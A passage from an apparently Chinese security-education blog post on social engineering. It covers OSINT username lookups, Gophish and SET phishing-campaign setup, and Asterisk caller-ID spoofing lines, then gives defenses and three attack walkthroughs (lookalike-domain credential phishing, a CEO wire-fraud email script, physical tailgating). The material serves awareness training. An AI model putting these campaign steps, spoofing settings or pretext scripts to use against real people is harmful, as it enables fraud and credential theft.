LinkedIn Sales Navigator ``` **社交媒体分析**: ```bash # Social-Analyzer $ python3 social-analyzer.py -u username -w twitter,facebook,instagram # Sherlock $ python3 sherlock.py username # Maigret $ python3 maigret.py username ``` ### 钓鱼工具 **Gophish 配置**: ```bash # 1. 安装 Gophish $ wget https://github.com/gophish/gophish/releases/latest/download/gophish-linux.zip $ unzip gophish-linux.zip $ ./gophish # 2. 配置 SMTP # 登录 https://localhost:3333 # 设置 → Sending Profiles → New Profile # 配置 SMTP 服务器、发件人 # 3. 创建模板 # 设置 → Email Templates → New Template # 编写钓鱼邮件内容 # 4. 创建 Landing Page # 设置 → Landing Pages → New Page # 上传伪造登录页面 # 5. 创建用户组 # 用户与组 → 新建组 # 导入目标邮箱列表 # 6. 启动活动 # 活动 → 新建活动 # 选择模板、页面、用户组 # 启动钓鱼活动 # 7. 查看结果 # 活动 → 查看结果 # 跟踪谁打开了邮件、点击了链接、提交了凭证 ``` **SET 使用**: ```bash # 启动 SET $ sudo setoolkit # 选择鱼叉式钓鱼攻击 1) 创建鱼叉式钓鱼攻击 2) 创建网站攻击向量 3) 创建感染媒介攻击 4) 创建大规模邮件攻击 5) 创建 Arduino 攻击 6) 创建无线接入点攻击 7) 创建 QRCode 攻击 8) 创建 Powershell 攻击 9) 创建短信欺骗攻击 10) 创建摄像头攻击 11) 创建基于 DNS 的攻击 # 选择创建鱼叉式钓鱼攻击 1) 创建钓鱼邮件模板 2) 创建网站攻击向量 3) 创建恶意附件 ``` ### 语音工具 **VoIP 工具**: ```bash # Asterisk VoIP $ asterisk -r # 配置拨号规则 exten => _X.,1,Dial(SIP/${EXTEN}) # 修改 Caller ID exten => _X.,1,Set(CALLERID(num)=+18005551234) # 在线 VoIP 服务 # - Twilio API # - Vonage API # - Plivo API ``` --- ## 防御与检测 ### 钓鱼邮件检测 **技术检测**: ``` ┌─────────────────────────────────────────────────────────────┐ │ 钓鱼邮件检测 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 1. 发件人验证 │ │ - 检查 SPF 记录 │ │ - 检查 DKIM 签名 │ │ - 检查 DMARC 策略 │ │ │ │ 2. 链接分析 │ │ - 悬停查看真实 URL │ │ - 检查域名相似度 │ │ - 使用链接扫描工具 │ │ │ │ 3. 附件分析 │ │ - 检查文件类型 │ │ - 沙箱运行分析 │ │ - 病毒扫描 │ │ │ │ 4. 内容分析 │ │ - 检查语法错误 │ │ - 检查紧迫感语言 │ │ - 检查品牌标识真实性 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` **用户培训要点**: ``` ┌─────────────────────────────────────────────────────────────┐ │ 用户培训要点 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ ✓ 警惕紧急邮件 │ │ ✓ 验证发件人身份 │ │ ✓ 悬停检查链接 │ │ ✓ 不轻易打开附件 │ │ ✓ 不回复可疑邮件 │ │ ✓ 报告可疑邮件给 IT 部门 │ │ ✓ 使用多因素认证 │ │ ✓ 定期更新密码 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` ### Vishing 防御 **防御措施**: ``` ┌─────────────────────────────────────────────────────────────┐ │ Vishing 防御 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 1. 验证来电身份 │ │ - 回拨官方号码验证 │ │ - 要求提供工号、部门 │ │ - 通过其他渠道确认 │ │ │ │ 2. 保护敏感信息 │ │ - 不电话提供密码 │ │ - 不电话提供银行卡信息 │ │ - 不电话进行转账 │ │ │ │ 3. 警惕紧急要求 │ │ - 真正的紧急事务会有正式通知 │ │ - 高管不会电话要求转账 │ │ - IT 不会电话索要密码 │ │ │ │ 4. 建立验证流程 │ │ - 财务转账需要多重确认 │ │ - 敏感操作需要书面确认 │ │ - 建立密码短语验证机制 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` ### 物理安全防御 **防御措施**: ``` ┌─────────────────────────────────────────────────────────────┐ │ 物理安全防御 │ ├─────────────────────────────────────────────────────────────┤ │ │ │ 1. 门禁管理 │ │ - 一人一卡,禁止尾随 │ │ - 访客需要登记和陪同 │ │ - 定期检查门禁系统 │ │ │ │ 2. 员工培训 │ │ - 识别可疑人员 │ │ - 验证陌生人工牌 │ │ - 报告可疑行为 │ │ │ │ 3. 访客管理 │ │ - 提前预约登记 │ │ - 发放临时工牌 │ │ - 全程陪同 │ │ │ │ 4. 物品管理 │ │ - 不捡拾陌生 USB 设备 │ │ - 锁好个人物品 │ │ - 敏感区域禁止带入外部设备 │ │ │ └─────────────────────────────────────────────────────────────┘ ``` --- ## 社会工程学实战案例 ### 案例 1:钓鱼攻击获取凭证 **背景**:某科技公司 **目标**:获取员工 Office 365 凭证 **攻击过程**: ``` 阶段 1: 信息收集 - 使用 theHarvester 收集员工邮箱 - LinkedIn 搜索员工姓名、职位 - 分析公司使用的系统(发现使用 Office 365) 阶段 2: 准备钓鱼 - 注册相似域名:micros0ft.com - 克隆 Microsoft 登录页面 - 编写钓鱼邮件模板 阶段 3: 发送钓鱼邮件 From: Microsoft Security <security@microsoft-account.com> Subject: 【重要】您的账户需要立即验证 内容:检测到异常登录,请立即验证账户,否则将被冻结。 阶段 4: 收集凭证 - 30% 员工打开邮件 - 15% 员工点击链接 - 8% 员工提交凭证 - 获取 50+ 个有效凭证 阶段 5: 后续利用 - 使用凭证登录 Office 365 - 访问公司邮件、文档 - 进一步内网渗透 ``` ### 案例 2:CEO 诈骗转账 **背景**:某制造企业 **目标**:财务转账欺诈 **攻击过程**: ``` 阶段 1: 信息收集 - LinkedIn 搜索 CFO 姓名、照片 - 了解公司供应商信息 - 分析财务流程 阶段 2: 伪装身份 - 注册相似域名:company-corp.com (真实:company.com) - 设置 CFO 签名档 - 准备话术脚本 阶段 3: 发送邮件 From: CFO <cfo@company-corp.com> To: 财务经理 Subject: 紧急 - 供应商付款 内容: 我正在开会,不方便接电话。 需要立即向供应商支付紧急款项:$150,000 请尽快处理,稍后补签字。 供应商账户:XXX Bank, Account: 123456789 阶段 4: 跟进施压 - 1 小时后发邮件催促 - 强调"非常紧急" - 威胁"影响业务" 阶段 5: 成功转账 - 财务经理转账 $150,000 - 发现被骗时已晚 - 资金已转移到海外 ``` ### 案例 3:物理入侵获取访问 **背景**:某金融机构 **目标**:物理进入数据中心 **攻击过程**: ``` 阶段 1: 准备 - 购买保安制服、工牌 - 准备假工牌(伪造公司 Logo) - 准备对讲机(道具) 阶段 2: 踩点 - 观察员工进出时间 - 观察安保流程 - 识别薄弱环节 阶段 3: 执行 - 早上 8:30(高峰时间) - 穿保安制服站在门口 - 自然地为员工开门 - 进入大楼 阶段 4: 深入 - 假装检查消防设施 - 进入各楼层 - 拍照记录布局 阶段 5: 数据中心 - 到达数据中心门口 - "我是来检查门禁系统的" - 保安未核实即开门 - 成功进入数据中心 阶段 6: 信息收集 - 拍照服务器布局 - 记录设备型号 - 收集废弃文档 ``` --- ## 总结与思考 ### 核心要点回顾 1. **社会工程学利用人性弱点**,技术防御难以完全阻止 2. **钓鱼是最常见的攻击方式**,需要持续培训和演练 3. **物理安全同样重要**,不要忽视尾随、伪装入侵 4. **OSINT 信息收集是基础**,公开信息可能被用于攻击 5. **多层防御是关键**,技术 + 流程 + 人员培训 ### 深入思考 **问题 1:AI 对社会工程学的影响?** 我的观点: - AI 生成更逼真的钓鱼邮件 - Deepfake 语音/视频诈骗 - 自动化目标分析 - 防御也需要 AI 辅助检测 **问题 2:远程办公带来的新风险?** 我认为: - 家庭网络安全性降低 - 视频钓鱼(Vishing 2.0) - 协作工具被利用 - 边界模糊增加风险 **问题 3:如何平衡安全与便利?** 我建议: - 多因素认证是底线 - 关键操作多重确认 - 持续安全意识培训 - 建立报告文化(不惩罚报告者) ### 实战建议 **给企业的建议**: ``` 1. 定期钓鱼演练 - 每季度至少 1 次 - 模拟真实攻击 - 统计点击率、提交率 2. 安全意识培训 - 新员工入职培训 - 定期复训 - 案例分享 3. 建立报告机制 - 简易报告渠道 - 不惩罚报告者 - 奖励发现者 4. 技术防御 - 邮件过滤(SPF、DKIM、DMARC) - 链接扫描 - 附件沙箱 - 多因素认证 ``` **给个人的建议**: ``` 1. 保持警惕 - 警惕紧急要求 - 验证发件人身份 - 悬停检查链接 2. 保护信息 - 社交媒体隐私设置 - 不公开敏感信息 - 谨慎处理陌生请求 3. 使用安全工具 - 密码管理器 - 多因素认证 - 反钓鱼浏览器插件 4. 持续学习 - 关注新攻击手法 - 参加安全培训 - 分享经验教训 ``` --- ## 参考资料 ### 学习资源 | 资源 | 类型 | 链接 | |------|------|------| | **OWASP 社会工程学** | 指南 | https://owasp.org/www-community/attacks/Social_Engineering_Attacks | | **SANS 安全意识** | 培训 | https://sans.org/security-awareness | | **KnowBe4** | 培训平台 | https://knowbe4.com | | **Open Phish** | 钓鱼 feed | https://openphish.com | ### 工具资源 | 工具 | 官网 | 用途 | |------|------|------| | **Gophish** | https://getgophish.com | 钓鱼框架 | | **SET** | GitHub | 社会工程学工具 | | **theHarvester** | GitHub | 信息收集 | | **Sherlock** | GitHub | 用户名搜索 | | **Maltego** | https://maltego.com | 情报分析 | ### 书籍推荐 | 书名 | 作者 | 难度 | |------|------|------| | 《Social Engineering: The Science of Human Hacking》 | Christopher Hadnagy | 入门 | | 《The Art of Deception》 | Kevin Mitnick | 经典 | | 《Ghost in the Wires》 | Kevin Mitnick | 传记 | | 《Unmasking the Social Engineer》 | Christopher Hadnagy | 进阶 | --- *365 天信息安全技术系列 | Day 217 | 社会工程学攻击技术 | 字数:约 21,000 字*
myh0st
2026年4月13日 23:20
分享文档
收藏文档
上一篇
下一篇
微信扫一扫
复制链接
手机扫一扫进行分享
复制链接
Markdown文件
分享
链接
类型
密码
更新密码